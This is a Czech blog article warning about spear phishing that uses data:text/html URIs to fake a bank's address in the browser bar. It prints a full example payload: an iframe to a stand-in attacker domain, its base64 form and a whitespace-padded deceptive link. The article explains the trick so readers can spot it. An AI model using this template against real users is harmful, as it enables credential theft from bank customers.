Nová generace phishingu je tady

Tyhle nové spear phishingové kampaně jsou nebezpečné především v tom, že oběť obdrží e-mail od někoho, koho dobře zná a jehož odpověď navíc i očekává.

Šance, že příjemce takového e-mailu pojme jakékoliv podezření, je skutečně minimální, a proto je tato kampaň velice nebezpečná a má značný potenciál.

Nedávno jsme mohli zaznamenat spear phishing kampaň na uživatele Gmailu, v rámci které byla navíc použita i technika „data URI“, která pak byla později použita i při obdobném phishing útoku na klienty České spořitelny.

Způsob, jak útok na uživatele Google probíhal, byl poměrně jednoduchý. Útočník kompromitoval e-mailový účet oběti, následně v doručené poště vyhledal e-mail s přílohou a udělal její screenshot. Poté vytvořil nový e-mail jako odpověď na tento e-mail se stejným nebo podobným předmětem, do něj pak vložil screenshot této přílohy a odeslal jej.

V těle tohoto e-mailu se pak nacházel odkaz na phishing web. Aby se zvýšila šance, že oběť na odkaz klikne a dojde k přesměrování, tak nebyl vyveden jako prostý text, nýbrž byl svázán s obrázkem, který se tvářil jako náhled dokumentu. Dostatečně malým na to, aby oběť motivoval na něj kliknout a zobrazit v plné velikosti.

Když pak uživatel na náhled obrázku klikne, tak se mu v prohlížeči otevře nová stránka, a pokud uživatel není dostatečně pozorný a nevšimne si, že spojení není bezpečné, tedy že se v adresním řádku nenachází zámeček, tak nepozná, že se stal obětí podvodu.

Celý trik spočívá v tom, že v adresním řádku prohlížeče je uveden text data:text/html; po kterém může následovat prakticky cokoliv, třeba https://www.xbank.cz nebo dokonce i jméno banky, např. Xbank a.s. [CZ] | https://www.xbank.cz; jak to ostatně bývá běžné u webů s certifikátem.

Za dalším středníkem pak následuje vlastní kód stránky, který má protokol „data“ interpretovat. Jelikož by si však oběť mohla všimnout HTML tagů, které jsou de facto předávány jako parametr, tak je provedeno jejich enkódování do base64 formátu.

V takovém případě se pak v adresním řádku objevuje jen dlouhý hexadecimální řetězec znaků, na který je oběť zvyklá, protože vypadá jako token. Není ale problém i tento řetězec odsunout zcela mimo zorné pole oběti vložením většího počtu mezer.

Enkódovat do base64 může útočník celou stránku, anebo může enkódovat jen kód, který mu libovolnou, předem připravenou stránku uloženou na nějakém kompromitovaném webu zobrazí v iframu.

Útočník může do base64 enkódovat něco jako <html><head></head><title>XBANK InternetBanking</title><body><iframe src=“http://ib.utocnikova-domena.cz/“ width=“100%“ height=“100%“ fullscreen=“yes“ frameborder=“0″ scrolling=“no“></iframe></body></html>

Výsledkem enkódování, vyzkoušet můžete i sami, např. pomocí online nástroje base 64encode, je pak takovýto řetězec: PGh0bWw+PGhlYWQ+PC9oZWFkPjx0aXRsZT5YQkFOSyBJbnRlcm5ldEJhbmtpbmc8L3RpdGxlPjxib2R5PjxpZnJhbWUgc3JjPSJodHRwOi8vaWIudXRvY25pa292YS1kb21lbmEuY3ovIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmdWxsc2NyZWVuPSJ5ZXMiIGZyYW1lYm9yZGVyPSIwIiBzY3JvbGxpbmc9Im5vIj48L2lmcmFtZT48L2JvZHk+PC9odG1sPg==

Ten útočník použije v odkazu, který pak celý vypadá nějak takto: <a href=”data:text/html; Xbanka a.s. [CZ] | https://ib.xbank.cz/                                                                                                                                                                                                                                                              ;base64, PGh0bWw+PGhlYWQ+PC9oZWFkPjx0aXRsZT5YQkFOSyBJbnRlcm5ldEJhbmtpbmc8L3RpdGxlPjxib2R5PjxpZnJhbWUgc3JjPSJodHRwOi8vaWIudXRvY25pa292YS1kb21lbmEuY3ovIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmdWxsc2NyZWVuPSJ5ZXMiIGZyYW1lYm9yZGVyPSIwIiBzY3JvbGxpbmc9Im5vIj48L2lmcmFtZT48L2JvZHk+PC9odG1sPg==“>https://ib.xbank.cz</a>

V takovém případě se pak v prohlížeči zobrazí v adresním řádku text, který chceme, a pod ním se načte naše stránka. Pokud si uživatele zkontroluje jen, že je tam uvedeno https a správná adresa webu a nezajímá ho ikona zámečku a text, který se nachází před https, tak je ztracen.

Takto lze zobrazit i to, co běžně vypisuje prohlížeč jen na stránkách, které jsou chráněny certifikátem. Jméno společnosti může být dokonce napsáno i s nabodeníčky, které nejsou uvedeny v adresním řádku ani na originální stránce dostupné přes https a chráněné certifikátem od důvěryhodné certifikační autority.

Jaké tedy z výše uvedeného plyne ponaučení? Návštěvník webu si musí kontrolovat nejen adresu webu, a zda je adresa uvedena oním obligátním https, ale především, zda je dané připojení opravdu bezpečné, a jaký web používá certifikát. Jinými slovy, v okamžiku, kdy se před https nachází něco jako je data:text/html, tak by měl zbystřit

Pokud vás tento článek zaujal, můžete odkaz na něj sdílet.

Štítky:


K článku “Nová generace phishingu je tady” se zde nenachází žádný komentář - buďte první.

Diskuse na tomto webu je moderována. Pod článkem budou zobrazovány jen takové komentáře, které nebudou sloužit k propagaci konkrétní firmy, produktu nebo služby. V případě, že chcete, aby z těchto stránek vedl odkaz na váš web, kontaktujte nás, známe efektivnější způsoby propagace.

Přihlášeným uživatelům se tento formulář nezobrazuje - zaregistrujte se.

Jméno:(požadováno)
E-mail:(požadováno - nebude zobrazen)
Web:

Text vaší reakce: